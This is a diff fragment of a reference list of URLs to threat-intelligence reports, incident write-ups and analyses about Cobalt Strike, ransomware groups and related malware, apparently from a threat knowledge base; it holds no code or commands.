- "https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/",
- "https://blog.nviso.eu/2021/10/27/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-2/",
- "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/",
- "https://thedfirreport.com/2020/10/08/ryuks-return/",
- "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
- "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader",
- "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html",
+ "https://www.arashparsa.com/catching-a-malware-with-no-name/",
+ "https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors",
+ "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/",
+ "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/",
+ "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure",
+ "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
+ "https://twitter.com/redcanary/status/1334224861628039169",
+ "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
+ "https://www.mandiant.com/resources/defining-cobalt-strike-components",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections",
+ "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware",
+ "https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts",
+ "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf",
+ "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
+ "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/",
+ "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2",
+ "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf",
+ "https://cert.gov.ua/article/619229",
+ "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/",
+ "https://blog.exatrack.com/melofee/",
+ "http://blog.nsfocus.net/murenshark",
+ "https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/",
+ "https://community.riskiq.com/article/f0320980",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
+ "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20",
+ "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass",
+ "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/",
+ "https://blog.talosintelligence.com/2021/05/ctir-case-study.html",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-265a",
+ "https://www.mandiant.com/resources/russian-targeting-gov-business",
+ "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html",
+ "https://michaelkoczwara.medium.com/cobalt-strike-powershell-payload-analysis-eecf74b3c2f7",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/542/original/CTIR_casestudy_2.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-148a",
+ "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
+ "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/",
+ "https://security.macnica.co.jp/blog/2022/05/iso.html",
+ "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf",
+ "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/",
+ "https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware",
+ "https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/",
+ "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/",
+ "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
+ "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65",
+ "https://videos.didierstevens.com/2022/09/06/an-obfuscated-beacon-extra-xor-layer/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
+ "https://401trg.com/burning-umbrella/ ",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
+ "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike",
+ "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/",
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
+ "https://isc.sans.edu/diary/rss/27176",
+ "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html",
+ "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html",
+ "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
+ "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
+ "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
+ "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730",
+ "https://bmcder.com/blog/cobalt-strike-dfir-listening-to-the-pipes",
+ "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
+ "https://www.youtube.com/watch?v=gfYswA_Ronw",
+ "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html",
+ "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns",
+ "https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ",
+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
+ "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html",
+ "https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/",
+ "https://www.secureworks.com/research/threat-profiles/gold-dupont",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/sneak-peek-ch1-2-finding-beacons-in-the-dark.pdf",
"https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/",
+ "https://www.youtube.com/watch?v=GfbxHy6xnbA",
+ "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html",
+ "https://insight-jp.nttsecurity.com/post/102ho8o/operation-restylink",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html",
+ "http://www.secureworks.com/research/threat-profiles/gold-winter",
+ "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan",
+ "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/",
+ "https://www.telsy.com/download/5972/?uid=d7c082ba55",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
+ "https://www.youtube.com/watch?v=ysN-MqyIN7M",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md",
+ "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/",
+ "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://blog.zsec.uk/cobalt-strike-profiles/",
+ "https://blog.macnica.net/blog/2020/11/dtrack.html",
+ "https://www.ironnet.com/blog/tracking-cobalt-strike-servers-used-in-cyberattacks-on-ukraine",
+ "https://ak100117.medium.com/analyzing-cobalt-strike-powershell-payload-64d55ed3521b",
+ "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/",
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper",
+ "https://www.cobaltstrike.com/support",
+ "https://www.youtube.com/watch?v=pIXl79IPkLI",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
+ "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
+ "https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718",
+ "https://blogs.blackberry.com/en/2021/11/zebra2104",
+ "https://thedfirreport.com/2022/03/07/2021-year-in-review/",
+ "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
+ "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://blog.group-ib.com/REvil_RaaS",
+ "https://thedfirreport.com/2022/01/24/cobalt-strike-a-defenders-guide-part-2/",
+ "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf",
+ "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
+ "https://bmcder.com/blog/extracting-cobalt-strike-from-windows-error-reporting",
+ "https://mez0.cc/posts/cobaltstrike-powershell-exec/",
+ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
+ "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
"https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/",
- "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt"
+ "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
+ "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/",
+ "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/",
+ "https://www.contextis.com/en/blog/dll-search-order-hijacking",
+ "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/",
+ "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/",
+ "https://blogs.blackberry.com/en/2022/01/log4u-shell4me",
+ "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/",
+ "https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike",
+ "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/",
+ "https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html",
+ "https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/",
+ "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5",
+ "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html",
+ "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811",
+ "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
+ "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes",
+ "https://teamt5.org/en/posts/hiding-in-plain-sight-obscuring-c2s-by-abusing-cdn-services",
+ "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://intel471.com/blog/shipping-companies-ransomware-credentials",
+ "https://twitter.com/vikas891/status/1385306823662587905",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "https://github.com/sophos-cybersecurity/solarwinds-threathunt",
+ "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.recordedfuture.com/solardeflection-c2-infrastructure-used-by-nobelium-in-company-brand-misuse/",
+ "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/",
+ "https://experience.mandiant.com/trending-evil-2/p/1",
+ "https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py",
+ "https://www.youtube.com/watch?v=XfUTpwZKCDU",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://isc.sans.edu/diary/rss/27618",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf",
+ "https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/",
+ "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
+ "https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf",
+ "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt",
+ "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/",
+ "https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664",
+ "https://netresec.com/?b=214d7ff",
+ "https://www.inde.nz/blog/different-kind-of-zoombomb",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
+ "https://asec.ahnlab.com/ko/19860/",
+ "https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/",
+ "https://www.cynet.com/understanding-squirrelwaffle/",
+ "https://paper.seebug.org/1301/",
+ "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns",
+ "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://www.istrosec.com/blog/apt-sk-cobalt/",
+ "https://isc.sans.edu/diary/rss/28934",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
+ "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64",
+ "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf",
+ "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
+ "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
+ "https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e",
+ "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach",
+ "https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion",
+ "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems",
+ "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
+ "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf",
+ "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
+ "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear",
+ "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
+ "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/",
+ "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike",
+ "https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
+ "https://blog.nviso.eu/2021/11/17/cobalt-strike-decrypting-obfuscated-traffic-part-4/",
+ "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos",
+ "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
+ "https://blog.nviso.eu/2022/03/22/cobalt-strike-overview-part-7/",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9",
+ "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
+ "https://morphuslabs.com/attackers-are-abusing-msbuild-to-evade-defenses-and-implant-cobalt-strike-beacons-edac4ab84f42",
+ "https://thedfirreport.com/2022/04/25/quantum-ransomware/",
+ "https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors",
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/",
+ "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/",
+ "https://www.ic3.gov/Media/News/2021/210823.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-waterfall",
+ "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/",
+ "https://www.ironnet.com/blog/ransomware-graphic-blog",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
+ "https://unit42.paloaltonetworks.com/cobalt-strike-memory-analysis/",
+ "https://forensicitguy.github.io/inspecting-powershell-cobalt-strike-beacon/",
+ "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
+ "https://wbglil.gitbook.io/cobalt-strike/",
+ "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/",
+ "https://skyblue.team/posts/scanning-virustotal-firehose/",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/harvester-new-apt-attacks-asia",
+ "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf",
+ "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
+ "https://msrc.microsoft.com/blog/2022/10/hunting-for-cobalt-strike-mining-and-plotting-for-fun-and-profit/",
+ "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b",
+ "https://twitter.com/elisalem9/status/1398566939656601606",
+ "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
+ "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/",
+ "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government",
+ "https://thehackernews.com/2022/05/this-new-fileless-malware-hides.html",
+ "https://binary.ninja/2022/07/22/reverse-engineering-cobalt-strike.html",
+ "https://medium.com/walmartglobaltech/cobaltstrike-uuid-stager-ca7e82f7bb64",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/",
+ "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/",
+ "https://www.varonis.com/blog/hive-ransomware-analysis",
+ "https://securelist.com/apt-luminousmoth/103332/",
+ "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/",
+ "https://michaelkoczwara.medium.com/mapping-and-pivoting-cobalt-strike-c2-infrastructure-attributed-to-cve-2021-40444-438786fcd68a",
+ "https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950",
+ "https://thedfirreport.com/2020/10/08/ryuks-return/",
+ "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent",
+ "https://www.youtube.com/watch?v=y65hmcLIWDY",
+ "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
+ "https://cyber.wtf/2022/03/23/what-the-packer/",
+ "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/",
+ "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://www.youtube.com/watch?v=WW0_TgWT2gs",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://zero.bs/cobaltstrike-beacons-analyzed.html",
+ "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
+ "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/",
+ "https://connormcgarr.github.io/thread-hijacking/",
+ "https://isc.sans.edu/diary/rss/28448",
+ "https://www.youtube.com/watch?v=FC9ARZIZglI",
+ "https://web.br.de/interaktiv/ocean-lotus/en/",
+ "https://community.riskiq.com/article/0bcefe76",
+ "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/",
+ "https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/",
+ "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor",
+ "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/",
+ "https://twitter.com/AltShiftPrtScn/status/1385103712918642688",
+ "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader",
+ "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html",
+ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://elastic.github.io/security-research/intelligence/2022/01/02.collecting-cobalt-strike-beacons/article/",
+ "https://www.youtube.com/watch?v=6SDdUVejR2w",
+ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one",
+ "https://marcoramilli.com/2022/05/10/a-malware-analysis-in-ru-au-conflict/",
+ "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
+ "https://twitter.com/ffforward/status/1324281530026524672",
+ "https://redcanary.com/blog/intelligence-insights-december-2021",
+ "https://kienmanowar.wordpress.com/2022/06/04/quicknote-cobaltstrike-smb-beacon-analysis-2/",
+ "https://www.malware-traffic-analysis.net/2021/09/17/index.html",
+ "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
+ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
+ "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot",
+ "https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk",
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
+ "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929",
+ "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
+ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
+ "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
+ "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/",
+ "https://twitter.com/MBThreatIntel/status/1412518446013812737",
+ "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/",
